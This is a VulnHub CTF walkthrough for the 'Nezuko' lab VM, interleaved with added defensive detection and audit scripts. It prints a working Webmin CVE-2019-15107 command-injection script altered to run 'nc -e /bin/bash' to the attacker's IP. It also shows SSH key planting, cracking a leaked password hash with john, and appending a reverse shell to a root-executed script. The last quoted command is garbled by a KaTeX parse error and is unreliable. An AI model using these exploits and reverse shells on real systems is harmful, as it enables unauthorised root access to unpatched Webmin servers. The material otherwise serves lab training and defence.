NEZUKO: 1——202201152003

2023-11-18

About Release

Download

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network”. If you understand the risks, please download!

  • nezuko.zip (Size: 2.9 GB)
  • Download: https://drive.google.com/open?id=1fsi4WvQnvYdpHaRMfNufyGiDKckmza_Z
  • Download (Mirror): https://download.vulnhub.com/nezuko/nezuko.zip

Description

Creator : @yunaranyancat (Twitter)

Difficulty : Easy ~ Intermediate

OS Used: Ubuntu 18.04

Services : Webmin 1.920, Apache, SSH

User : root, zenitsu, nezuko

Hashes : at their home directory

File Information

  • Filename: nezuko.zip
  • File size: 2.9 GB
  • MD5: 10DBD333208D012E620242276BE2F817
  • SHA1: 7D545A6F86532EC17157104F1952364A6AEDE2A5

Virtual Machine

  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

Networking

  • DHCP service: Enabled
  • IP address: Automatically assign

Walkthrough

1. Information gathering

Currently scanning: 172.16.91.0/16   |   Screen View: Unique Hosts               
                                                                                  
 9 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 540                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.199   00:0c:29:18:22:fe      1      60  VMware, Inc.                   
 192.168.219.1   f2:18:98:21:29:69      2     120  Unknown vendor                 
 192.168.219.180 00:0c:29:18:22:fe      2     120  VMware, Inc.                   
 192.168.219.254 00:50:56:fb:8b:50      2     120  VMware, Inc.                   
 192.168.219.2   00:50:56:f1:66:62      2     120  VMware, Inc.                   

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ sudo netdiscover -i eth0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8646  bytes 1926100 (1.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8646  bytes 1926100 (1.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -A 192.168.219.0/24 -T 4                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:06 CST
Nmap scan report for 192.168.219.1 (192.168.219.1)
Host is up (0.0017s latency).
All 1000 scanned ports on 192.168.219.1 (192.168.219.1) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.2 (192.168.219.2)
Host is up (0.0014s latency).
All 1000 scanned ports on 192.168.219.2 (192.168.219.2) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.177 (192.168.219.177)
Host is up (0.0013s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Debian 1 (protocol 2.0)
| ssh-hostkey: 
|   256 8c:8c:6e:2c:b9:f6:97:3c:5b:fc:30:eb:c5:29:0e:38 (ECDSA)
|_  256 ba:37:56:6d:cc:b1:a3:92:3a:09:c9:fb:9f:86:3e:39 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.0019s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.58 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 

┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -p- -A 192.168.219.180                                                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:10 CST
Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.00098s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
13337/tcp open  ssl/http MiniServ 1.920 (Webmin httpd)
|_http-title: Login to Webmin
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on ubuntu
| Not valid before: 2019-08-20T09:28:46
|_Not valid after:  2024-08-18T09:28:46
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 

2. Try the exploit script (CVE-2019-15107)

#!/bin/sh
#
# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
then
	echo '\033[0;31mVULNERABLE!\033[0m'
else
	echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
            
            

                                                                               
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ sh shell1.sh https://192.168.219.180:13337 
test
https://192.168.219.180:13337
Testing for RCE (CVE-2019-15107) on https://192.168.219.180:13337: VULNERABLE!
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 
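
Seen from the defender's side, the request the check script sends is a POST to /password_change.cgi whose `old` form field carries a shell metacharacter, which can be matched in captured HTTP traffic. The following Python is an added example, not part of the original walkthrough or of the script above; the tab-separated capture format, the sample records and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Form fields sent to password_change.cgi in the request shown on this page.
FIELDS = ("user", "old", "new1", "new2")

# Characters that let a form value break out into a shell command.
SHELL_META = re.compile(r"[|;&`\n]|\$\(")

# Constructed sample records, not taken from a real log.
# Assumed format: time, source IP, method, path, raw request body (tab-separated),
# as a reverse proxy or packet capture in front of Webmin could produce.
SAMPLE_CAPTURE = """\
2023-01-15T20:34:10\t192.0.2.10\tPOST\t/password_change.cgi\tuser=wheel&pam=&expired=2&old=id|echo CONSTRUCTED_MARKER&new1=wheel&new2=wheel
2023-01-15T20:35:02\t192.0.2.11\tPOST\t/password_change.cgi\tuser=alice&pam=&expired=2&old=Winter2022&new1=Spring2023&new2=Spring2023
2023-01-15T20:36:40\t192.0.2.10\tPOST\t/password_change.cgi\tuser=wheel&old=id%7Cecho+CONSTRUCTED_MARKER&new1=wheel&new2=wheel
2023-01-15T20:37:00\t192.0.2.12\tPOST\t/session_login.cgi\tuser=admin&pass=a|b
2023-01-15T20:38:00\t192.0.2.13\tGET\t/password_change.cgi\t
"""


def suspicious_fields(body):
    """Return {field: decoded value} for fields that contain shell metacharacters."""
    hits = {}
    # parse_qsl URL-decodes values, so "%7C" and a literal "|" are treated alike.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in FIELDS and SHELL_META.search(value):
            hits[name] = value
    return hits


def scan(capture):
    """Return one finding per POST to password_change.cgi with a suspicious field."""
    findings = []
    for lineno, line in enumerate(capture.splitlines(), 1):
        parts = line.split("\t")
        if len(parts) != 5:
            continue  # malformed record, skip it
        ts, src, method, path, body = parts
        if method != "POST" or path.split("?", 1)[0] != "/password_change.cgi":
            continue
        hits = suspicious_fields(body)
        if not hits:
            continue
        # A real password may contain "|" or ";", so a hit in new1/new2 alone is
        # only marked for review; "old" is the field used in the request above.
        severity = "high" if "old" in hits else "review"
        findings.append(
            {"line": lineno, "time": ts, "src": src, "severity": severity, "fields": hits}
        )
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_CAPTURE):
        print(finding)
```
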

nc -e /bin/bash attack_ip port (author: 合天网安实验室, https://www.bilibili.com/read/cv3530863/, source: bilibili)

nc -e /bin/bash 192.168.219.177 4444

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -lnvp 4444             
listening on [any] 4444 ...
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 51698

ls
Authen-SolarisRBAC-0.1
CHANGELOG
acl-lib.pl

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)

                                       
python -c 'import pty;pty.spawn("/bin/bash")' 

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/usr/local/webmin/acl
ls -l
total 736
pwd
/home/nezuko
tail nezuko.txt

from_zenitsu
nezuko.txt

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,


1af0941e0c4bd4564932184d47dd8bef

cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...


1af0941e0c4bd4564932184d47dd8bef



cd from_zenitsu
ls
new_message_15-01-2023_17:05
new_message_15-01-2023_20:05
new_message_15-01-2023_20:10
new_message_15-01-2023_20:15
new_message_15-01-2023_20:20
new_message_15-01-2023_20:25
new_message_15-01-2023_20:30
new_message_15-01-2023_20:35
new_message_15-01-2023_20:40
new_message_15-01-2023_20:45
new_message_21-08-2019_01:13
new_message_21-08-2019_09:11
new_message_21-08-2019_09:12
new_message_21-08-2019_09:13
new_message_21-08-2019_09:40
cat new*
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 



ls
nezuko
zenitsu
cd zenitus
cd zenitsu
ls
to_nezuko
zenitsu.txt
cat zenitsu.txt
Kaminari no kokyū, Ichi no kata...., Hekireki Issen!

3f2ada6791f96b6a50a9ee43ee6b62df



sshkey

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh-keygen -t rsa    
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinginglab/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in sshkey
Your public key has been saved in sshkey.pub
The key fingerprint is:
SHA256:YyAJh37bhxAcyQPLL9V6SEPXlz2xgHrBlpJkLsD7i4o pinginglab@pinginglab
The key's randomart image is:
+---[RSA 3072]----+
| .+=++++ o.o..   |
| .o***o B o.o.   |
| .o.Bo++ o  ..   |
|  o+o*...        |
|  .o++.oS        |
|   .o.o...       |
|   . . .         |
|. . .            |
|E.               |
+----[SHA256]-----+
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ls                              
 47230.rb  'shell1 copy.sh'   shell1.sh   sshkey   sshkey.pub
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat sshkey.pub       
ssh-rsa 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 pinginglab@pinginglab

cat /home/nezuko/.ssh/authorized_keys
ssh-rsa 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 pinginglab@pinginglab 



┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh -i sshkey nezuko@192.168.219.180                        
The authenticity of host '192.168.219.180 (192.168.219.180)' can't be established.
ED25519 key fingerprint is SHA256:2Ru1IBosCTKF6TvCVfZdwFwIaEjQloQOwvpfhwVTi04.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.219.180' (ED25519) to the list of known hosts.
Warning: SSH client configured for wide compatibility by kali-tweaks.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

404 packages can be updated.
189 updates are security updates.

New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ pwd
/home/nezuko
nezuko@ubuntu:~$ cd /home
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ sudo su zenitsu
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
sudo: 2 incorrect password attempts
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
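
In the dump above, zenitsu's entry carries a sha512crypt hash in the world-readable second field of /etc/passwd instead of the `x` that defers to /etc/shadow, so any local account can read it. The audit below is an added example, not part of the original walkthrough; the function names `audit_passwd` and `write_sample` and the `demo` account are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag /etc/passwd entries whose password field is not shadowed.

# write_sample FILE: three lines copied from the dump above plus one
# constructed entry ("demo") with an empty password field.
# The quoted delimiter ('EOF') matters: unquoted, the shell would expand
# $6, $LbPWwHSD, ... as parameters and corrupt the hash.
write_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
demo::1002:1002::/home/demo:/bin/bash
EOF
}

# audit_passwd FILE: print one finding per account that needs attention.
audit_passwd() {
    awk -F: '
    function scheme(id) {
        if (id == "1") return "md5crypt"
        if (id == "5") return "sha256crypt"
        if (id == "6") return "sha512crypt"
        if (id == "y") return "yescrypt"
        if (id ~ /^2[abxy]?$/) return "bcrypt"
        return "unknown"
    }
    # Shadowed ("x") and locked ("*", "!...") entries are the expected state.
    $2 == "x" || $2 == "*" || $2 ~ /^!/ { next }
    # An empty field means the account needs no password at all.
    $2 == "" { print $1 " EMPTY-PASSWORD-FIELD"; next }
    {
        # crypt(3) strings look like $id$salt$hash or $id$rounds=N$salt$hash.
        n = split($2, p, "[$]")
        if (n >= 4 && p[1] == "") {
            rounds = "n/a"
            if (p[2] == "5" || p[2] == "6")
                rounds = (p[3] ~ /^rounds=[0-9]+$/) ? substr(p[3], 8) : "5000(default)"
            print $1 " HASH-IN-PASSWD scheme=" scheme(p[2]) " rounds=" rounds
        } else {
            print $1 " HASH-IN-PASSWD scheme=legacy-or-unknown"
        }
    }' "$1"
}

# With an argument, audit that file (e.g. /etc/passwd); otherwise run the sample.
if [ $# -gt 0 ]; then
    audit_passwd "$1"
else
    sample=$(mktemp)
    write_sample "$sample"
    audit_passwd "$sample"
    rm -f "$sample"
fi
```

The fix for a finding is to move the hash into /etc/shadow (for example with `pwconv`) and to rotate the password, since the hash must be treated as disclosed.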

crack hash:

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txrt
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt 
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ echo  "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt
                                                                                   
                                                        
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist = /usr/share/wordlists/rockyou.txt  zenhash.txt
stat: =: No such file or directory
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt 
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
meowmeow         (?)     
1g 0:00:00:00 DONE (2023-01-15 21:27) 1.030g/s 3694p/s 3694c/s 3694C/s asdf1234..fresa
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 

meowmeow

switch user:

nezuko@ubuntu:/home$ su zenitsu
Password: 
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:/home$ cd zenitsu/
zenitsu@ubuntu:~$ ls
to_nezuko  zenitsu.txt
zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls
send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
zenitsu@ubuntu:~/to_nezuko$ ls -al
total 12
drwxr-xr-x 2 zenitsu root    4096 Ogos 21  2019 .
drwxr-xr-x 4 zenitsu zenitsu 4096 Ogos 21  2019 ..
-rw-r--r-- 1 zenitsu root     150 Ogos 21  2019 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ echo  "nc -e /bin/bash 192.168.219.177 5555" >> send_message_to_nezuko.sh 
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 192.168.219.177 5555
zenitsu@ubuntu:~/to_nezuko$ 


third flag

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc  -lnvp 5555
listening on [any] 5555 ...

id
id
id
id
id
id
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 41430
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
id
uid=0(root) gid=0(root) groups=0(root)
ls
root.txt
snap
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat

3ca33b8158d9dee5c35a7d6d793c7fd5
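
The root shell above came from send_message_to_nezuko.sh, a script that runs with root privileges while both the file and its directory are owned by zenitsu, as the `ls -al` listing shows. The check below is an added example, not part of the original walkthrough; the page does not show how root invokes the script, so the list of root-executed paths is an assumed input, and the names `audit_root_script` and `make_demo_tree` are illustrative.

```shell
#!/bin/sh
# Added example: find scripts run by a privileged account that a less
# privileged account can modify, either directly or through the parent
# directory (directory write access is enough to replace the file).

# audit_root_script TRUSTED_UID PATH...
# Prints one finding per line; no output means nothing was found.
audit_root_script() {
    trusted=$1
    shift
    for script in "$@"; do
        dir=$(dirname "$script")
        for target in "$script" "$dir"; do
            if [ ! -e "$target" ]; then
                echo "MISSING $target"
                continue
            fi
            # -prune keeps find on the named path itself (no descent).
            if [ -n "$(find "$target" -prune ! -user "$trusted" -print)" ]; then
                echo "UNTRUSTED-OWNER $target"
            fi
            if [ -n "$(find "$target" -prune \( -perm -0020 -o -perm -0002 \) -print)" ]; then
                echo "GROUP-OR-WORLD-WRITABLE $target"
            fi
        done
    done
}

# make_demo_tree: constructed layout with the same names and modes as the
# listing on the page (directory 755, script 644), owned by the current user.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir "$root/to_nezuko"
    printf '#!/bin/bash\n' > "$root/to_nezuko/send_message_to_nezuko.sh"
    chmod 755 "$root/to_nezuko"
    chmod 644 "$root/to_nezuko/send_message_to_nezuko.sh"
    echo "$root"
}

# Demo: ownership cannot be changed without privileges, so the "wrong owner"
# case is simulated by naming a different uid as the trusted one.
demo=$(make_demo_tree)
echo "trusted uid = owner (expect no findings):"
audit_root_script "$(id -u)" "$demo/to_nezuko/send_message_to_nezuko.sh"
echo "trusted uid != owner (the situation in the listing):"
audit_root_script "$(( $(id -u) + 1 ))" "$demo/to_nezuko/send_message_to_nezuko.sh"
rm -rf "$demo"
```

On a real host the call would be `audit_root_script 0 <path>` for every script referenced by root's scheduled jobs; a finding is resolved by making root the owner of the script and of its directory, outside any user's home.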


other escape


using:

https://www.bilibili.com/read/cv3530863/

Then modify the poc.sh script: change the part of the script that runs echo '$FLAG' to nc -e /bin/bash attack_ip port. After the change it looks like this:

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks KaTeX parse error: Expected 'EOF', got '&' at position 41: … -d 'user=wheel&̲pam=&expired=2&…URI’/session_login.cgi’|grep $FLAG>/dev/null 2>&1

Author: 合天网安实验室 https://www.bilibili.com/read/cv3530863/ Source: bilibili
